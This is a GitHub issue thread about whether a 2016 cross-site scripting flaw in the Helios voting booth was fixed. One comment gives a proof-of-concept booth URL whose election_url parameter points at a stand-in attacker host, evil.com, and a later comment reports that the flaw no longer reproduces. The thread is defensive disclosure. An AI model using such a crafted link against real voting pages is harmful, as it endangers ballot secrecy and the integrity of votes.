helios-server icon indicating copy to clipboard operation
helios-server copied to clipboard
verified publisher icon benadida

2016 XSS issue on Wikipedia

Open richardolsson opened this issue 6 years ago • 5 comments

The Wikipedia article for Helios describes a 2016 XSS security issue and claims that "It is unclear if the vulnerability has been fixed as of 2019".

The issue is explained as such:

In 2016 researchers identified a cross-site scripting vulnerability. If the attacker is able to get a voter to click a specially crafted link, the voter will land on a modified HELIOS page which can violate ballot secrecy or manipulate votes.[5]

The citation is this 2016 article.

Has said issue been fixed, and if so, maybe it would be a good idea to update the Wikipedia page?

richardolsson avatar Nov 06 '19 08:11 richardolsson

I'm not sure about this, but.. I looked over the research paper and I checked also the BOOTH. Using jQuery will generate also some vulnerabilities but this can be fixed by using only pure JS.

Talking about XSS, django settings has

django.middleware.clickjacking.XFrameOptionsMiddleware

adamalexandru4 avatar Mar 21 '20 19:03 adamalexandru4

I read the paper, the version that is deployed still seems to be vulnerable: https://vote.heliosvoting.org/booth/vote.html?election_url=http://evil.com/get-bad-data makes requests to evil.com.

redfast00 avatar Apr 20 '21 06:04 redfast00

@benadida ^ is this something you would accept a PR for? Is it okay to just block external URL's?

redfast00 avatar Apr 20 '21 06:04 redfast00

In particular, line 370 of heliosbooth/vote.html still uses $.getJSON, so that might still be vulnerable to XSS

redfast00 avatar Apr 20 '21 07:04 redfast00

The XSS with getJSON seems to have been fixed (I can't reproduce it).

redfast00 avatar Apr 28 '21 11:04 redfast00